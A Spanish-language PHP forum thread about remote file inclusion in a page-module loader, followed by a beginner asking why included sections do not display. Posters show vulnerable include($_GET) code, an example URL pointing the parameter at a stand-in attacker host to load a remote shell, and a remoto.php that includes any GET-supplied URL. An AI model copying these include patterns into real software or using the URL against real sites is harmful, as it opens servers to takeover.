Buenas,

El problema los codigos que son hackeables mediante RFI es que directamente hacen algo como:

include($_GET['id'].".php");

Con esto pueden hackearte directamente haciendo algo como:

http://www.tuweb.com/?id=http://www.webdelhacker.com/ruta_shell

Todos los archivos php podrán ser incrustados en tu web y de esta forma seria hackeada.

No todos, porque hay servidores que tienen safe_mode activado (en el php.ini), por lo tanto no funciaría

Saludos.

De donde lo va a sacar? de su celebro xD
No es hackeable por RFI porque es imposible incluir un archivo exterior y si digo imposible es imposible xD

Un saludo

Buenas,

No es imposible tampoco,, se podría hacer teniendo un archivo llamado remoto.php que cogiera & incluyera la url vía GET

remoto.php
<?
include($_GET["url"]);
?>

Y accediendo así ?id=remoto&url=url , se podría acceder , aunque sería de bobos hacer eso... pero alguno habrá..

Saludos

El se referia al codigo que yo he puesto.

Fede muy bobo no... cualquier principiante o cualquier programador que pueda tener un despiste pum ya metio la pata

hombre logico... seguramente lo abras puesto abajo del codigo la web y fuera de la tabla que le toca xD

Buenas  ;D

Lo qué yo sigo teniendo problemas. Siempre pongo un sistema de modulación, pero esta vez, me da por ponerlo y no me sale nada en la web :S
No lo entiendo.

en el index pongo:
 <?PHP
if (isset($_GET['id'])) {
if (!empty($_GET['id']) && $_GET['id'] != "index") {
if (file_exists($_GET['id'].".php")) {
include ($_GET['id'].".php");
} else {
echo "No existe esta seccion";
}
} else {
include ("principal.php");
}
} else {
include ("principal.php");
}
?>
Y de hipervinculo
index.php?id=secciony creo el archivo principal, y en ese archivo pongo lo que quiero, pero una vez creado eso
en la web, no me sale nada  :'(

Alguien me puede ayudar?
Merci

Tienes que ponerle de nombre al archivo igual del que quieres que ponga en id=nombre_del_archivo_a_incluir

Haber eso ya lo ago >.<
por ejemplo yo pongo
index.php?id=serdj
y esque no me va >.<

Es qué no lo entiendo, sigo todo los pasos que me dice naveda, pero nada.. no me sale :S

Algo debes hacer mal! FIJO!

Repasatelo porfavor

Haber... xDDDDD
Qué me lo e repasado 200 veces
y un amigo mio me lo esta repasando, y dice que tampoco encuentra el error :S

Que ago? 

Recuerdo qué puse esto:
<?PHP
if (isset($_GET['id'])) {
if (!empty($_GET['id']) && $_GET['id'] != "index") {
if (file_exists($_GET['id'].".php")) {
include ($_GET['id'].".php");
} else {
echo "No existe esta seccion";
}
} else {
include ("principal.php");
}
} else {
include ("principal.php");
}
?>
Y para las secciones pongo:
index.php?id=secciony lo de seccion, se que ai que cambiarlo, que no soy tonto xD